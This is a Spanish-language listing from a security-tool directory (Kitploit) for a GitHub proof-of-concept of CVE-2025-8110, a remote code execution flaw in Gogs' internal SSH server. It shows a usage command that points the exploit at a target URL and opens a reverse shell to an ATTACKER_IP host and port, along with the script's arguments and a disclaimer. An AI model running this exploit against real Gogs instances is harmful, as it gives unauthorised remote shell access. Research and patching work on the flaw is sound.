Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
gogs-CVE-2025-8110 — CVE-2025-8110 PoC | Kitploit
Herramientas/GitHubGitHub/zabuqasem/gogs-cve-2025-8110
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubzabuqasem/gogs-cve-2025-8110

gogs-CVE-2025-8110

CVE-2025-8110 PoC

Ver Repositorio
29hace 7 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2025-8110 en Gogs

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-8110, una vulnerabilidad de Ejecución Remota de Código (RCE) en Gogs. El exploit apunta a la implementación del servidor SSH interno, permitiendo a los atacantes inyectar comandos maliciosos a través de la configuración sshCommand.

Uso

Para ejecutar el exploit, use el script CVE-2025-8110.py con la URL objetivo de Gogs y su host/puerto de escucha para la reverse shell.

root@kitploit:~
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>

Argumentos

  • -u, --url: URL base de la instancia de Gogs objetivo (p. ej., http://localhost:3000).
  • -lh, --host: Dirección IP a la que la reverse shell debe conectarse de vuelta.
  • -lp, --port: Puerto al que la reverse shell debe conectarse de vuelta.
  • -x, --proxy: (Opcional) Use un proxy local en http://localhost:8080 para depuración.

Aviso legal

Esta Prueba de Concepto (PoC) es solo para fines educativos y de investigación. Está pensada para ayudar a investigadores de seguridad y administradores a comprender y mitigar la vulnerabilidad CVE-2025-8110.

El autor no se hace responsable de ningún uso no autorizado o malintencionado de este código. Utilice esta herramienta únicamente en sistemas que le pertenezcan o sobre los que tenga permiso explícito para realizar pruebas. Al usar este código, usted acepta asumir toda la responsabilidad por sus acciones.

Descargar herramienta